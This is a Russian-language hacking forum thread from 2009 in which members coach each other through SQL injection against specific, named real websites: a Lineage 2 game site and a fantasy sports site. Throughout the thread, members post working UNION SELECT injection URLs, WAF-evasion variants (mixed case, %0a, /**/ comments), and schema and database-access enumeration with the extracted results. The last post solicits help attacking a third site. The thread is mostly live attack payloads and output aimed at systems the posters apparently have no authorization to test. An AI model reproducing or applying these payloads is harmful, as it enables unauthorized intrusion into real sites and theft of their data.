HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2009, 20:50
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка


fedi, доступа к базам л2-сервара нету

http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db .user_account

Его как правило и не бывает. С этими базами работает непосредственно л2-сервер
 
Ответить с цитированием

  #2  
Старый 15.03.2009, 21:58
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию

Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?
 
Ответить с цитированием

  #3  
Старый 15.03.2009, 22:00
fedi
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913

Репутация: 3
По умолчанию

мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
 
Ответить с цитированием

  #4  
Старый 15.03.2009, 22:25
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Цитата:
Сообщение от fedi  
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
нету там фильтра на from
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+IN FORMATION_SCHEMA.TABLES--
 
Ответить с цитированием

  #5  
Старый 15.03.2009, 22:34
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
Версия пятая.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline= 141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

что можно сделать? Очень нужен совет.
 
Ответить с цитированием

  #6  
Старый 15.03.2009, 22:42
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

@Imperou$
у меня Forbidden, попробуй регистрт UnIoN+sElEcT или union%0aselect
 
Ответить с цитированием

  #7  
Старый 16.03.2009, 12:17
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от fedi  
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
хоть я не очень дружу с MSSQL но так на вскидку:
смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):
PHP код:
http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4,5,6,7,DB_NAME(0),9,1,1,1-- 
lin2world - 1
master - 1
tempdb - 1
model - 0
msdb - 1
lin2db - 0
lin2comm - 0
l2gloss - 0
lin2world - 1
lin2log - 0
lin2clancomm - 0
смотрим таблички и колонки доступные текушему пользователю
PHP код:
http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,QUOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCHEMA.COLUMNS-- 
крч ничего особено хорошего нету.
 
Ответить с цитированием

  #8  
Старый 15.03.2009, 22:41
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

5.0.67-community



Цитата:
Сообщение от fedi  
Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?
С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету

Последний раз редактировалось ElteRUS; 15.03.2009 в 22:46..
 
Ответить с цитированием

  #9  
Старый 15.03.2009, 22:54
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Цитата:
Сообщение от ElteRUS  
http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2

5.0.67-community
ElteRUS я невнимательный идиот.Спасибо большое, а ларчик просто открывался
 
Ответить с цитированием

  #10  
Старый 16.03.2009, 00:32
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

http://www.customoutfitters.com/co_home/products.php?productCat=4

Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ